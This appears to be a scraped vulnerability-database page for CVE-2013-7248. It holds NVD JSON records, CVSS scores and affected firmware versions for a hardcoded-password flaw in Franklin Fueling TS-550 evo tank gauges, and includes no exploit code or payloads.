          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.3.1.7492:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.0.0.6833:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:franklinfueling:ts-550_evo:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7248"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-255"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2014-01-27T15:58Z",
      "publishedDate": "2014-01-26T01:55Z"
    }
  }
}

FKIE_CVE-2013-7248

Vulnerability from fkie_nvd - Published: 2014-01-26 01:55 - Updated: 2025-04-11 00:51

Severity ?

Summary

References

	URL	Tags
	cve@mitre.org	https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt	Exploit
	af854a3a-2127-422b-91ae-364da2661108	https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt	Exploit

Impacted products

Vendor	Product	Version
franklinfueling	ts-550_evo_firmware	2.0.0.6833
franklinfueling	ts-550_evo_firmware	2.3.1.7492
franklinfueling	ts-550_evo	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.0.0.6833:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB8CD55-2ACE-4096-833C-6CA7200C3BB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.3.1.7492:*:*:*:*:*:*:*",
              "matchCriteriaId": "0678228E-44A4-406F-B37F-2C563CB1F12F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:franklinfueling:ts-550_evo:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "42AF9F76-7481-4621-B002-510053E61A7B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
    },
    {
      "lang": "es",
      "value": "Franklin Fueling Systems TS-550 evo con firmware 2.0.0.6833 y otras versiones anteriores a 2.4.0 tiene una contrase\u00f1a embebida en el c\u00f3digo para la cuenta roleDiag, lo cual permite a atacantes remotos obtener privilegios de root, como fue demostrado utilizando una acci\u00f3n cmdWebCheckRole en una TSA_REQUEST."
    }
  ],
  "id": "CVE-2013-7248",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-01-26T01:55:09.890",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-255"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2013-7248 (GCVE-0-2013-7248)

GHSA-RG6R-Q2RV-884M

VAR-201401-0296

Request

Response

Request

Response (note the ROLE)

GSD-2013-7248

FKIE_CVE-2013-7248

Tags

Sightings

Nomenclature